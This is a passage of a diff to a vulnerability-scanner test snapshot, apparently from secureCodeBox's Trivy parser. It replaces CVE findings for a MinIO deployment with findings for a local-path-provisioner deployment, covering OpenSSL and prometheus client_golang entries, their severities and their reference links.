"https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "Certificate policy check not enabled", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", + "references": [ + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + ], + }, + "category": "Vulnerability", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Dual_EC_DRBG: weak pseudo random number generator", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2953", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "fixedVersion": "1.11.1", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-21698", + "installedVersion": "v1.1.0", + "packageName": "github.com/prometheus/client_golang", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-2953", - "https://bugs.openldap.org/show_bug.cgi?id=9904", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", - "https://www.cve.org/CVERecord?id=CVE-2023-2953", + "https://access.redhat.com/errata/RHSA-2022:8057", + "https://access.redhat.com/security/cve/CVE-2022-21698", + "https://bugzilla.redhat.com/2044628", + "https://bugzilla.redhat.com/2045880", + "https://bugzilla.redhat.com/2050648", + "https://bugzilla.redhat.com/2050742", + "https://bugzilla.redhat.com/2050743", + "https://bugzilla.redhat.com/2065290", + "https://bugzilla.redhat.com/2107342", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107376", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2107390", + "https://bugzilla.redhat.com/2107392", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "https://errata.rockylinux.org/RLSA-2022:8057", + "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "https://github.com/prometheus/client_golang/pull/962", + "https://github.com/prometheus/client_golang/pull/987", + "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "https://linux.oracle.com/cve/CVE-2022-21698.html", + "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "https://pkg.go.dev/vuln/GO-2022-0322", + "https://www.cve.org/CVERecord?id=CVE-2022-21698", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "null pointer dereference in ber_memalloc_x function", + "name": "Denial of service using InstrumentHandlerCounter", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2953", + "value": "https://avd.aquasec.com/nvd/cve-2022-21698", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2953", + "value": "https://access.redhat.com/errata/RHSA-2022:8057", }, { "type": "URL", - "value": "https://bugs.openldap.org/show_bug.cgi?id=9904", + "value": "https://access.redhat.com/security/cve/CVE-2022-21698", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", + "value": "https://bugzilla.redhat.com/2044628", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", + "value": "https://bugzilla.redhat.com/2045880", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2953", + "value": "https://bugzilla.redhat.com/2050648", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2015-3276", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", - "references": [ - "http://rhn.redhat.com/errata/RHSA-2015-2131.html", - "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", - "http://www.securitytracker.com/id/1034221", - "https://access.redhat.com/security/cve/CVE-2015-3276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", - "https://linux.oracle.com/cve/CVE-2015-3276.html", - "https://linux.oracle.com/errata/ELSA-2015-2131.html", - "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", - "https://www.cve.org/CVERecord?id=CVE-2015-3276", - ], - }, - "category": "Vulnerability", - "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "incorrect multi-keyword mode cipherstring parsing", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2015-3276", + "value": "https://bugzilla.redhat.com/2050742", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2015-2131.html", + "value": "https://bugzilla.redhat.com/2050743", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", + "value": "https://bugzilla.redhat.com/2065290", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1034221", + "value": "https://bugzilla.redhat.com/2107342", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2015-3276", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2015-3276.html", + "value": "https://bugzilla.redhat.com/2107376", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2015-2131.html", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2015-3276", + "value": "https://bugzilla.redhat.com/2107388", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-14159", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", - "references": [ - "http://www.openldap.org/its/index.cgi?findid=8703", - "https://access.redhat.com/security/cve/CVE-2017-14159", - "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", - "https://www.cve.org/CVERecord?id=CVE-2017-14159", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a "kill \`cat /pathname\`" command, as demonstrated by openldap-initscript.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "openldap: Privilege escalation via PID file manipulation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-14159", + "value": "https://bugzilla.redhat.com/2107390", }, { "type": "URL", - "value": "http://www.openldap.org/its/index.cgi?findid=8703", + "value": "https://bugzilla.redhat.com/2107392", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-14159", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-14159", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-17740", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", - "http://www.openldap.org/its/index.cgi/Incoming?id=8759", - "https://access.redhat.com/security/cve/CVE-2017-17740", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", - "https://www.cve.org/CVERecord?id=CVE-2017-17740", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "openldap: contrib/slapd-modules/nops/nops.c attempts to free stack buffer allowing remote attackers to cause a denial of service", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-17740", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { "type": "URL", - "value": "http://www.openldap.org/its/index.cgi/Incoming?id=8759", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-17740", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-17740", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": 